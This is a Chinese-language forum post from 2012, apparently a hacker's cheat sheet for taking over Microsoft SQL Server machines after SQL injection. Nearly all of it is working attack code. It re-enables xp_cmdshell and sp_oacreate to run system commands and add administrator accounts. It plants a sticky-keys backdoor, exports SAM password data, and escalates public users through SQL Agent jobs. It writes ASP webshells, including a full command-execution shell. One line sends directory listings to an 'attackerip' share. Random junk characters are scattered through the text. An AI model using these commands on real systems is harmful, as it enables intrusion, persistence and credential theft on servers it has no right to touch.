1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号# S0 u$ e4 L9 u
恢复方法:查询分离器连接后,
3 K* x( L5 r+ |2 J' i. W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int ) q) ?( k4 C# _- l/ x/ Y9 K. r R: q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 X' o$ C" v( V, _5 B3 q然后按F5键命令执行完毕 ~" {( o2 X0 A7 R, |. @9 q: }+ u
1 t ]/ e3 k( G1 d; ^5 |- C G2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! ?; H! e% L: U5 R' `/ A& Y恢复方法:查询分离器连接后,
6 r0 J3 h" ?8 h# ?第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"" G( n+ G) @9 g: ~; r
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll': @2 {" Z; m; w( E: | g
然后按F5键命令执行完毕1 o$ C* k5 q, w" Y
7 K1 o. i6 N; K
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 d7 Y/ S( S. i/ i$ B; D# S恢复方法:查询分离器连接后,
+ W v1 u* E$ ]' T; f5 C第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
* {) B3 _8 {8 B3 M' A, T2 g第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 9 \8 {6 V1 t% z1 P$ A6 M- ~( o* J
然后按F5键命令执行完毕0 H& R! P* p) k* V; s( S
, }2 }% i% ]2 O4 终极方法.
( f5 M; A' g; |% q如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
* g4 j( A( l) n' f$ K/ ^1 w0 c2 S; i查询分离器连接后,
& M: R2 H. M% w- G* N& _8 Z- {2000servser系统:8 o( G; w8 o, G. n/ f7 N; {3 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'" L8 m/ k# x+ A3 L9 T6 o
/ i/ p1 j1 k' v; w( o( Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'+ N: D: X* ^2 a# Q$ Q' i2 b
3 l! K6 @8 t w0 \6 ?xp或2003server系统:
4 ~/ X W- H& h7 c3 G4 M* F3 l4 A7 }# v- i2 y$ L. Y; i5 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'% [& g$ K% |2 }4 q# n
5 ], P7 d; K X% ~& Y1 K4 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4 i6 ^" X/ A! `. P" L: P0 u" y9 C% ~4 W# [/ l
9 c2 _( ]4 E3 k1 z; X$ g" d; W: @五个SHIFT4 j4 g( G5 O9 l2 @- v
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';( B+ `+ ^5 S2 S6 F! A
9 H9 g; ]6 {6 ^; p0 k3 _" M: j
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
$ A) _, |) L$ [! |9 Y4 a% E; o" H# o+ @* g% x) S! Q
xp_cmdshell执行命令另一种方法 i$ r& v% [9 e. y' b2 ^
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 4 ~! ?7 i" b4 V* q& T6 M9 Z
& G; q; @( H3 v( u, v4 @
判断存储扩展是否存在
. m0 t0 a/ L. [+ a: D7 J/ K; u4 @Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
+ u) ^4 [* N' s! l" C+ g返回结果为1就OK+ J9 R# J& z- F8 e% K$ A: w
9 G% d! X/ g v: N9 p" V( K# Q
9 i2 C, u- ]1 }上传xplog70.dll恢复xp_cmdshell语句:
$ [" d' F' x! y7 K: o2 Ksp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'1 e$ a* X* B7 Q
# a% G: T& ` I否则上传xplog7.0.dll
& i' x- ], M& ~0 r2 EExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'7 Z0 `! ]9 ~# J6 z% T, o" N
6 i6 P, L8 |) ~* g+ i" o
3 P* J, T5 H, _. e
, t: ^! U x; d5 m! \% r首先开启沙盘模式:
6 D. d6 ^' ^7 i) N* Yexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: y( J2 y! A' d) ^1 u, w0 b
* i& I8 U0 _! f0 z/ L# w4 a, N
然后利用jet.oledb执行系统命令
+ A8 M; r2 W7 f. c2 Y( Y" e: eselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')5 z0 R) X2 l7 q& N- Q# M, p
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了5 C8 P- O7 h* x/ O& T
* V6 |) D3 O/ B, n, D% }4 X3 V Y8 o: o
! b1 O! o+ U( _: r0 i恢复过程sp_addextendedproc 如下:
" b) i {2 n( d$ k3 u: o Dcreate procedure sp_addextendedproc --- 1996/08/30 20:13 ' ?( T1 d. r+ i0 t6 a, |
@functname nvarchar(517),/* (owner.)name of function to call */ 5 G4 v' s. _0 x* n9 [) h8 C
@dllname varchar(255)/* name of DLL containing function */ ' H0 R% R# r4 l6 t2 O
as
( n1 X' W. e/ I' dset implicit_transactions off
$ Y& a1 F/ ~8 P) W* [if @@trancount > 0 " ]# {0 T9 D: x# z7 S$ X0 D9 f6 P0 G
begin 0 D, N/ g2 ^" l" m7 c
raiserror(15002,-1,-1,'sp_addextendedproc')
- Z$ ~6 G* ]& rreturn (1)
" z" k; W) P; v( o' Y2 zend 8 W9 X% Z6 ^& K
dbcc addextendedproc( @functname, @dllname) 0 V* p0 Z; I i* Z, I
return (0) -- sp_addextendedproc 7 u+ J4 s- @, V
GO . ~1 e8 ], P0 ]9 j( {
! e _$ q: z' Z% ~) ?# |; e
* L, V/ q$ w4 C
1 d/ [! P! e2 j1 ^ f导出管理员密码文件
+ \/ } u8 c' R2 Y5 Ysa默认可以读sam键.应该。: c& E. \7 J: D$ O, Z4 |/ J
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
4 X( O2 b1 | \ K: ~! znet user administrator test! l" X q$ k# d. n s, N
用administrator登陆.
! U* u/ S' D; r7 p3 @用完机器后
+ N( ~3 x. y0 zreg import c:\test.reg
, ?$ i6 t7 ^0 B7 |% C根本不用克隆.( w; o" B! S0 K: t2 o6 d
找到对应的sid.
" J9 ?3 i/ v& U& c6 f0 J: M
1 Y( Y! S( U6 t$ m8 a3 u% W! g
' s- ^- v$ J8 M% G. U7 C$ L& P0 z. h/ A0 S
恢复所有存储过程
3 Y+ r0 C; @, s5 Z4 ?! c4 F7 _use master
& k+ l6 R# `/ }6 y: Vexec sp_addextendedproc xp_enumgroups,'xplog70.dll' ; x. E4 e" [1 B: e
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
* j/ I$ V4 m9 x4 Qexec sp_addextendedproc xp_loginconfig,'xplog70.dll'
/ _8 k2 m ?& N+ j: T8 K7 iexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' ) O1 H! p" M& e" s7 U3 K
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
: a8 w4 W) E# \" V4 W Yexec sp_addextendedproc sp_OACreate,'odsole70.dll' 5 i4 \# D1 T) U( l+ J% v
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
6 A7 ]' d$ E# f! Y) a0 dexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
& u, N6 F. v+ k Nexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' + x: z: H2 _) G' l& a& e) o( A1 m
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
, l& f- F' J' f( E, [exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ( T: }, N% R5 C
exec sp_addextendedproc sp_OAStop,'odsole70.dll' 1 e1 V! P0 O; H& N
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' . T9 p( ^1 U, \6 Z9 z
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' % M: {7 Y8 i0 R7 L8 M$ ?0 A# r
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
[ N# Q+ o" oexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
3 v9 Y' G8 [$ u7 c Eexec sp_addextendedproc xp_regread,'xpstar.dll' ; B) y5 s M- Q% c/ Q! R
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 9 W9 t- p4 W! a9 C+ H: N5 k
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 3 {3 |: j& @$ ?; g; g- G% ~( r
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'+ p2 y" w) L, a: i
0 Z; H7 {' |9 H* k7 Y
& N3 [- e7 \6 Z: K9 ~, r& r
建立读文件的存储过程6 ?, Y# t3 n' }# F8 _
Create proc sp_readTextFile @filename sysname
' S; _* F; }3 J. I4 U) P0 u: \as0 s" S; Y! v- F: C( b3 m! `2 L/ I
0 ~9 P2 @$ O4 o+ r R W# X begin * G; v7 Q" `& B) U8 p) Z; A) J
set nocount on
) i5 U F) p. J Create table #tempfile (line varchar(8000))- E9 k7 y! f) g$ y7 C4 U, Y
exec ('bulk insert #tempfile from "' + @filename + '"')1 L* G4 @' V2 e! B+ ~+ S) _
select * from #tempfile3 E$ g- z% p# v% Z. i
drop table #tempfile
3 y: n: |4 z. _- y+ ~) cEnd; X% N9 k3 ~! ]9 |% X
" l. m; A! J/ ?9 G( w
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
6 y' w, h& z! q% [2 y查看登录用户( n2 g6 U' P/ b0 w; i
Select * from sysxlogins
# Q, N7 i) t5 \' f9 @) Y2 L
0 m/ D. F ?( v6 S/ l9 u把文件内容读取到表中4 {7 u* V& U; G: ^; ~: S1 \0 {# ^
BULK INSERT tmp from "c:\test.txt"
7 o6 I0 q8 `8 o# P D1 M6 r- M2 T+ ~8 odElete from 表名 清理表里的内容
; x; U4 D; d- X% B" A! H- Ycreate table b_test(fn nvarchar(4000));建一个表,字段为fn
: q& d) O5 Q/ f7 I
: ^8 Z, Y9 w9 t O
$ a/ V# u8 @4 z3 @加sa用户5 j9 O [% N: A" O! `( ^ B
exec master.dbo.sp_addlogin user,pass;
3 M/ C7 @/ G1 _; Zexec master.dbo.sp_addsrvrolemember user,sysadmin8 Z2 @; w7 I( r1 }1 s
9 L6 V# W/ B" Y
# r E9 R1 k2 B1 x. y# o8 D
1 x2 O* k( Q) }4 h0 E; i读文件代码9 K. r/ {9 A2 D6 f& V. A' W
declare @o int, @f int, @t int, @ret int
" R6 o' ~$ U0 A$ B, o5 D7 i" A/ C* ddeclare @line varchar(8000)1 m$ w9 J6 ~9 `6 l. s* C
exec sp_oacreate 'scripting.filesystemobject', @o out
' s7 S! Y2 a5 I3 Y" V7 jexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
9 a2 }; v! v: S- Vexec @ret = sp_oamethod @f, 'readline', @line out! e( H5 ?. O+ a! N
while( @ret = 0 )
4 L2 D; r; c0 h+ D( d3 u/ ^begin
, K2 q# n5 v, @print @line* O9 ~4 h. `( l- {/ Y, r- j" M
exec @ret = sp_oamethod @f, 'readline', @line out
1 z: U: r5 j' F( a/ f& u7 Wend0 ]3 D; [* M, \" V0 p" ~, I9 f! u
& q+ r% U. v4 z0 A
8 Q A" g5 R# h# Q8 ]4 [& Y写文件代码:. Z9 _) Z, j3 }6 J0 _ d
declare @o int, @f int, @t int, @ret int
7 J2 O" }; U4 A0 Kexec sp_oacreate 'scripting.filesystemobject', @o out& F% |8 W1 s5 K, w
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 17 v% s* W! C4 c9 w& a
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》+ F7 z$ j; _2 H5 v# B# j& \
J3 V; V3 _$ y( u; U8 X! S
% i/ y9 d& d+ t+ s! R, p$ B7 i添加lake2 shell" _/ X$ Q# {- {
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'4 {) U* B5 ~; J6 [" j) y
sp_dropextendedproc xp_lake2
; u6 A4 H1 T# ]( FEXEC xp_lake2 'net user' @2 N# H% O) @" D/ T
( Z- J/ [0 o+ n) f& f/ ~
$ A) ~7 J A* J- V得到硬盘文件信息 * u* Y( m1 b t$ c
--参数说明:目录名,目录深度,是否显示文件 7 C5 Z9 j! r7 k+ I& Y \4 _
execute master..xp_dirtree 'c:' 3 l5 a: q* V) N' J" R7 [
execute master..xp_dirtree 'c:',1 ( k6 j* B: b ?* u$ [) s4 C
execute master..xp_dirtree 'c:',1,1 ( F: k8 q5 A& b' t9 {+ Q1 A, h
8 {+ ]9 {: h5 G# w" D$ V
/ y8 @: U6 Q+ a q# p
读serv-u配置信息
& O) j- I8 ^4 O# H {. Lexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
8 d3 _9 ^6 d/ ~, G% s% dexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'- i. l( x4 q; U- n3 Z% j2 }) R
3 h; v! K7 V& Y. |5 d+ e
通过xp_regwrite写SHIFT后门4 [5 V& x$ l/ L! `1 O! f9 h
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
3 N) X2 Z, f9 F' U0 |" [) y& [& \4 n7 ~
X$ M5 l3 l e8 T, F3 ~2 _- {! I# p# I# p0 R
3 e9 W0 w; A6 n# L7 p$ W
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';7 i$ Q% S$ y: q; {1 T* @
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
) Y" ~! H6 T, p; N, q7 b7 F6 p1 L3 \9 Y" \
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'3 y% E+ C$ a0 Q' |( n1 e
3 b% u+ Q& P0 _' ^' y( w6 U- j( J% V
6 _# g& b8 h. }! u$ d* }( ~0 osql server 2005下开启xp_cmdshell的办法9 k7 q& {; Z. M( ]. }3 ?9 @' ?* e
" c9 V( T- A3 a
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;. R* B7 c& W' B, t [
# h4 [. J, @" T u4 K) s3 l T+ ?& W
SQL2005开启'OPENROWSET'支持的方法:
2 M+ U% t9 y* R) `' }* v I# J( H0 k9 L9 [, H
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;, N# _" f# ~& r; ~2 `; r! I$ y
6 f0 a. O6 n. z5 D" e
SQL2005开启'sp_oacreate'支持的方法:
2 ]* c! E% `4 d' @, c+ ]
0 l, s; z1 _( d0 X* o( H6 sexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
5 O7 W1 A" T' f3 ^/ `4 G
( `# j% x1 A- F% y1 O
9 A* N# U: \' F* r& c# G% V, e/ z% Q; g
5 B3 J* q2 |8 p
7 y0 @, k1 G2 `; v+ v) R. i8 N2 D/ z* `5 X; r5 d" b
U6 t. A) [9 L: {! Q/ c& Q
, ]% {6 ?8 z: j9 Y
' S2 s8 P- L9 @% ^9 O7 K0 y. N3 O7 m M9 O1 Z
- \" k# @. [ F
/ o. y% n' p; G9 Q2 q1 Z
: L9 v* M6 c; f9 ^
+ P4 n. R. G' U$ ?9 m
* S) |: {: j) T: J
6 E0 i$ y2 k# B/ J. T
2 w' e' @ G4 V1 B/ V' D/ W- \
5 O! L7 H" k7 [2 e& _* M
& u. i6 e* i) [: {: B* t! X$ {: @4 ]6 T3 \" N$ \6 u
2 Y* p1 `" K# c9 l" a9 r. m' W
1 L* f- Z7 ?7 l! P
$ L6 r( O5 r. f- S7 y3 u3 C: H% M, C" V" P3 l- L
以下方面不知道能不能成功暂且留下研究哈:& ]6 _+ k* q S1 c# W/ n, t3 M( H
4)
5 R0 Z' {" f' O; I+ v" Tuse msdb; --这儿不要是master哟
0 F4 Y G! ~/ m0 ~$ ]exec sp_add_job @job_name= czy82 ;
* B# q9 q# H& W& q- E3 Qexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;# p1 x. x2 W% u6 W
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
4 ?* T$ L! Z+ _4 Wexec sp_start_job @job_name= czy82 ; e* |, r/ x2 a0 C/ i( T
: n; j, p2 |- s* d利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
0 o4 a' a+ F% \" r3 ?' B0 K' q执行tsql语句了.) P8 s0 B# A! H' A
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
; F# g9 C$ i4 W7 Q! q0 n$ ~第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧): S- U- a3 E3 L1 {2 s
net start SQLSERVERAGENT
" \2 ^; z. X9 D' O, h* L
) m( \! E5 Z+ B( r6 t对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的+ ~- B9 Y) V$ p, o- S* m
USE msdb$ |6 L J, i5 |: J/ j8 D+ k" n
EXEC sp_add_job @job_name = GetSystemOnSQL ,
S2 N0 ]( M O) q' j% |@enabled = 1,; ~5 |) ]% V) D4 v- Z8 m
@description = This will give a low privileged user access to5 h1 Z l! a w7 C) r4 r
xp_cmdshell ,
# N+ O0 G* B. f+ U% H% c/ `9 d@delete_level = 1
6 X2 D3 ?* U& j$ j8 A1 d1 t1 p `8 KEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
2 }' T$ [2 u! \! k: i8 |# K* R@step_name = Exec my sql ,
: I' U0 O. P1 O; z4 {7 t@subsystem = TSQL ,
( S. F- Z, ]1 M3 v" s w@command = exec master..xp_execresultset N select exec
( w4 n9 ?3 ]0 k, S ?6 }- hmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
( Q- f7 H, @) B6 T1 SEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
9 y* j3 _* y0 e3 b4 _4 ^% W( w@server_name = 你的SQL的服务器名 3 P' ?: L4 h1 w, ]0 g
EXEC sp_start_job @job_name = GetSystemOnSQL
5 E9 x3 H) z1 ?- ^2 M; y; N' I8 m3 H' Q' \/ b
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
. B0 S& ]2 \) O C' m才让我们可以以public执行xp_cmdshell! i. E5 Y7 U% b" K- r, m8 \
, @, y3 W# L8 E8 P7 }/ _, w3 D9 n5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
& h3 v; E6 V8 n% [; e在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
3 {% l# N: z" J+ L# }- w
8 o$ Z' M8 b/ d" ^, w* OUSE msdb9 l% O- n/ z% q! O; g
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
0 P- Z3 c$ C* I K@enabled = 1,7 e6 @* k& L5 I$ ?7 l+ R
@description = This will create a file called c:\sqlafc123.txt ,
) L8 t4 L2 A. A" T4 ?0 R@delete_level = 1
5 N, f! o0 `0 Y5 ~" PEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,* F K# V4 h5 W$ h2 G
@step_name = SQLAFC ,
+ l/ g+ b2 _7 n* {@subsystem = TSQL ,
$ w7 b+ e* _; ~4 x) o$ h0 [. T! M@command = select hello, this file was created by the SQL Agent. ,
/ ^5 O8 { v; J' }@output_file_name = c:\sqlafc123.txt ' u' p9 f0 ]6 a
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
6 W% l h! |( p@server_name = SERVER_NAME
$ e2 D# g0 ]4 }+ ^EXEC sp_start_job @job_name = ArbitraryFilecreate 5 U: b) E5 J0 t0 A" @" b
! p6 K6 ?7 a( T如果subsystem选的是:tsql,在生成的文件的头部有如下内容
; a8 p- m" u- e* U+ ^" s* c9 l) H, t# ^( C g' @% x! H2 W
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:196 L% v6 H- u( e* M6 N
----------------------------------------------7 W0 K% V' k# L/ A
hello, this file was created by the SQL Agent.
- Z: Z9 g5 y' G
3 _8 H! r( L8 P$ O(1 ?????)' v7 P% {0 d1 h7 ?
% K) h% b" v7 `$ S$ p2 W" }! G5 m
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员/ Z; A) X: H: E g+ v
命令的vbs文件到启动目录!
. H6 P, A, Q0 c
% q! {; [/ S0 J6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
; \& S/ H0 R3 k/ }* I关于sp_MScopyscriptfile 看下面的例子2 ^, B/ S+ K1 e6 B
declare @command varchar(100) ( K3 g/ ]6 y' M) e
declare @scripfile varchar(200)
7 b" b1 O' f6 H! W3 ^3 Zset concat_null_yields_null off
5 O3 q1 }- \3 F. M+ d5 N0 gselect @command= dir c:\ > "\\attackerip\share\dir.txt"
4 Y9 o/ t0 q: j- q4 lselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
& x" u. }* T+ ~7 B9 ~, Dexec sp_MScopyscriptfile @scripfile , $ S3 @$ }3 Z0 U" W: k
- \# |6 K. h; ?* m$ L, F这两个东东都还在测试试哟
* W* b& f5 {) ^" \. U1 C$ p, S2 T让MSSQL的public用户得到一个本机的web shell
2 z& q _+ S) Z$ g ~2 x- g( F a% e8 P' z& @9 g* T+ y( K
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,# w* {8 q* l0 W0 ]7 p, B8 ~% c" z
--@query= select <img src=vbscript:msgbox(now())>
" y# U) ]2 X; y. S# w; g8 E! Y--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> : Q1 {9 _+ Z- x8 s4 s
@query= select 5 Q6 Q0 v* b6 y+ ~+ @$ {
<%On Error Resume Next 4 D( u3 V; E) E! z3 p% h
Set oscript = Server.createObject("wscript.SHELL")
8 m4 e, X+ T- ]3 K+ \Set oscriptNet = Server.createObject("wscript.NETWORK") + P. i. F4 w4 _5 i' O* @4 J
Set oFileSys = Server.createObject("scripting.FileSystemObject")
7 P; `) `* {0 u* i w3 wszCMD = Request.Form(".CMD") 4 n0 ?; _5 G0 F |6 x4 ?+ h8 v ?! D
If (szCMD <>"")Then % \) T; \1 r4 Q
szTempFile = "C:\" & oFileSys.GetTempName()
7 {0 O' @ B. [: R5 f8 SCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) : Z( k1 L1 {+ K6 q# I& W. C6 }9 t
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) 7 G$ T6 ?) d- p/ d5 a
End If %> $ [( V7 m6 R; p
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
3 I! X2 ^+ W+ O) P& a9 v, \# E4 k<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
$ F9 M/ k, F# \! J0 U) j; g7 ~; [</FORM><RE>
, x3 I8 x: m. l. X. T5 y/ R<% If (IsObject(oFile))Then 9 W2 X2 j' X" F- v; H) R/ `2 l' _
On Error Resume Next
0 t0 b/ R( V9 R6 QResponse.Write Server.HTMLEncode(oFile.ReadAll)
: x8 K" b% `6 T) C' s4 m% C; `oFile.Close
- H. v1 R1 s T4 C: K' dCall oFileSys.deleteFile(szTempFile, True) # C( G; U; x; c* H1 N; k; Y0 S
End If%> / x5 ^; s( j# O% t+ J" U/ W+ @
</BODY></HTML>
5 Q4 t; p0 z% Q. A* M0 G |
发表于 2012-9-15 14:37:30
收藏
支持
反对